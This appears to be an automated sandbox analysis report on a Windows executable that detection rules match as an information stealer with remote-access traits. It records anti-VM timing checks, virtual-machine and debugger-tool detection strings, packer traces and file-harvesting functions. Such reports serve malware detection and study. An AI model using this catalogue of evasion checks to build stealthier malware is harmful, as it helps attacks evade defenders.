Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5C1EBC second address: 5C1ECC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5B4D24B716h 0x00000008 ja 00007F5B4D24B716h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5C35D6 second address: 5C35FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4C774D97h 0x00000007 push esi 0x00000008 jmp 00007F5B4C774D8Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5C77A8 second address: 5C77B7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5B4D24B718h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5C7347 second address: 5C734B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5C74F3 second address: 5C74F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D9F41 second address: 5D9F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5D9F47 second address: 5D9F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DBB61 second address: 5DBB65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E81A9 second address: 5E81BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5B4D24B71Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E802C second address: 5E8030 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5E8030 second address: 5E8036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FBFC4 second address: 4FBFF3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5B4C774D8Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F5B4C774D94h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FBFF3 second address: 4FBFF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4FBFF9 second address: 4FC00D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F5B4C774D86h 0x0000000e ja 00007F5B4C774D86h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F122D second address: 5F1245 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 ja 00007F5B4D24B716h 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007F5B4D24B71Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F1245 second address: 5F124B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F13A5 second address: 5F13AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5B4D24B716h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F13AF second address: 5F13B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F13B3 second address: 5F13C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5B4D24B716h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F180E second address: 5F181E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5B4C774D86h 0x00000008 jo 00007F5B4C774D86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F19B8 second address: 5F19CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jng 00007F5B4D24B716h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F1B47 second address: 5F1B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jg 00007F5B4C774D99h 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F1C97 second address: 5F1CB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5B4D24B71Eh 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F5B4D24B716h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F1CB4 second address: 5F1CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F567B second address: 5F5695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5B4D24B726h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F5695 second address: 5F56A1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5B4C774D86h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F51E7 second address: 5F51EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6043F2 second address: 6043F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6043F7 second address: 604432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5B4D24B727h 0x00000009 jg 00007F5B4D24B716h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5B4D24B727h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FE7B3 second address: 5FE7BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61128E second address: 611294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 611294 second address: 611298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620CF5 second address: 620CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620E50 second address: 620E55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620E55 second address: 620E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6212AC second address: 6212BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jne 00007F5B4C774D86h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6212BC second address: 6212C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 621595 second address: 6215C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4C774D8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F5B4C774D8Eh 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 js 00007F5B4C774D86h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6219C2 second address: 6219C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625F04 second address: 625F09 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625F79 second address: 625F8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jng 00007F5B4D24B716h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6264E9 second address: 6264EE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6264EE second address: 6264FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F5B4D24B716h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6264FF second address: 626503 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626503 second address: 62650C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62650C second address: 626571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5B4C774D92h 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F5B4C774D88h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 jmp 00007F5B4C774D8Ch 0x0000002b push dword ptr [ebp+122D3270h] 0x00000031 mov edx, ecx 0x00000033 push 8306E6A5h 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F5B4C774D95h 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628F7A second address: 628F80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628F80 second address: 628FA2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5B4C774D86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5B4C774D96h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628FA2 second address: 628FC8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F5B4D24B729h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628FC8 second address: 628FD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628FD0 second address: 628FDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628FDB second address: 628FDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62B019 second address: 62B01D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0276 second address: 4FF02B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 5998h 0x00000007 mov ah, dl 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e call 00007F5B4C774D99h 0x00000013 push ecx 0x00000014 pop edi 0x00000015 pop ecx 0x00000016 mov bl, DAh 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F5B4C774D8Bh 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0377 second address: 4FF039C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4D24B721h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5B4D24B71Dh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF039C second address: 4FF03A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF03A2 second address: 4FF03A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF03A6 second address: 4FF03B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop ebx 0x0000000f mov cl, 95h 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF03B8 second address: 4FF0402 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5B4D24B726h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edi, cx 0x00000010 pushfd 0x00000011 jmp 00007F5B4D24B726h 0x00000016 xor si, 6088h 0x0000001b jmp 00007F5B4D24B71Bh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 3918E1 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 38F5E2 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 55150B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 5CE55C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_001438B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00144910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00144910
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0013DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_0013DA80
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0013E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_0013E430
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0013ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_0013ED20
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00144570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00144570
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0013DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0013DE10
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0013BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_0013BE70
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0013F68A FindFirstFileA | 0_2_0013F68A
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0013F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0013F6B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00143EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00143EA0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_001316D0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00131160 GetSystemInfo,ExitProcess | 0_2_00131160
                Source: file.exe, file.exe, 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2066181737.000000000100E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware`
                Source: file.exe, 00000000.00000002.2066181737.0000000001089000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2066181737.000000000100E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.2066181737.000000000107A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2066181737.0000000001053000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWh,
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13593
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13596
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13647
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13607
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13615
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001345C0 VirtualProtect ?,00000004,00000100,00000000 | 0_2_001345C0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00149860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00149860
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00149750 mov eax, dword ptr fs:[00000030h] | 0_2_00149750
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00147850 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_00147850
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 1520, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00149600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_00149600
                Source: file.exe, file.exe, 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: t9Program Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree | 0_2_00147B90
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00146920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess | 0_2_00146920
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00147850 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_00147850
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00147A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA | 0_2_00147A30

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.file.exe.130000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.2066181737.000000000100E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.2024949095.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 1520, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 0.2.file.exe.130000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.2066181737.000000000100E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.2024949095.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 1520, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP
                Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties | DNS | Network Trust Dependencies
                Resource Development: Acquire Infrastructure | Domains | DNS Server | Virtual Private Server | Server | Botnet | Web Services | Serverless
                Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services | Drive-by Compromise
                Execution: 2 Command and Scripting Interpreter | 11 Native API | At | Cron | Launchd | Scheduled Task | Systemd Timers | Container Orchestration Job
